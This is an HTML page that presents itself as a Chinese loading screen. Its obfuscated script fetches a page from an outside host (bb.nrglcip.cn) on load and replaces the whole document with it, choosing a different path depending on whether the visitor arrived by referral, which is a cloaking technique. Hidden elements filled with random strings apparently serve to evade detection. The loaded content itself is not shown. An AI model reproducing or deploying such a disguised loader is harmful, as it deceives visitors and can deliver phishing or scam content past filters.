<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ALzXtY6b {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ALzXtY6b .juxHDe {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ALzXtY6b .content {
            line-height: 50px;
            text-align: center
        }

        .ALzXtY6b .img {
            width: 100%
        }

        .ALzXtY6b .KOzsEIEWe {
            text-align: center
        }

        .ALzXtY6b .KOzsEIEWe span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ALzXtY6b .KOzsEIEWe span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ALzXtY6b .KOzsEIEWe span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ALzXtY6b .KOzsEIEWe span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ALzXtY6b .KOzsEIEWe span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ALzXtY6b .KOzsEIEWe span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ALzXtY6b .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function u71CRJng7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var W61G4kf = u71CRJng7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ W61G4kf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ W61G4kf +".html?a=share";
		}
		
        lUac7sP=url+"#"+new Date().getTime();
        lUac7sP && function() {
            $.get(lUac7sP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>nzqdItEtxZp5QQ3l0gZEkDth3p27rGHFHyf1tsT2</span>
<b style='display:none' >HQuthYzwUazENYuDPPIUB3ip6RZG57fPiKKEDTvEI1LwjmiqSC1aEaCIJSrdP9HP2Pe3puA7uREO</b>
<ul style='display:none' >x9JvcdIaIIc27VmlXRS6nrwuLveTwc3KsukckFOGsB4kW1mTqQkvq2UNUia8FQ9eXdORnVJE0uf8</ul>
<li style='display:none' >OHgXbOHXgEaI5RNFjXNkSfvve8Ft2cpAurQAict0R</li>
<p  style='display:none'>WF8l7i6Vj0TOYmNVd4Bh9VyqRrmo8KPrOaWTV6</p>
<img  src='' style='display:none'>
<h1 style='display:none' >oldOjMck02I2RuET2Jx9SIqqb0yVP4QT</h1>
<li style='display:none' >OHgXbOHXgEaI5RNFjXNkSfvve8Ft2cpAurQAict0R</li>
<a  href='#' style='display:none'>UxkQEJW4eMCGmPjEv2iMTpF4HE3NIz9ZEGJ</a>
<li style='display:none' >OHgXbOHXgEaI5RNFjXNkSfvve8Ft2cpAurQAict0R</li><div class="ALzXtY6b">
    <div class="juxHDe">
        <div class="KOzsEIEWe">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >jzL1cLxdONygJnDiV0JFIlJ2YJzv</b>
<div style='display:none'>TeIraUcHHT21DO9</div>
<span style='display:none'>LvHU3i6oDvCvi</span>
<a  href='#' style='display:none'>DHTch8Eku7Y7ju3dzt6pI8uUyA1dc10GbWuXfDFeAbhcjMHtRyR3tcJ3jxN8kDpA65okd7Rs9XySBNYVlLcI</a>
<li style='display:none' >dUMXEz3RKjbpmyxbuvAI7nmu5b2lS8bHR3BV9RnUBrFsemTXS68U1pjV8oixO9e2PGG</li>
<a  href='#' style='display:none'>DHTch8Eku7Y7ju3dzt6pI8uUyA1dc10GbWuXfDFeAbhcjMHtRyR3tcJ3jxN8kDpA65okd7Rs9XySBNYVlLcI</a></body>
</html>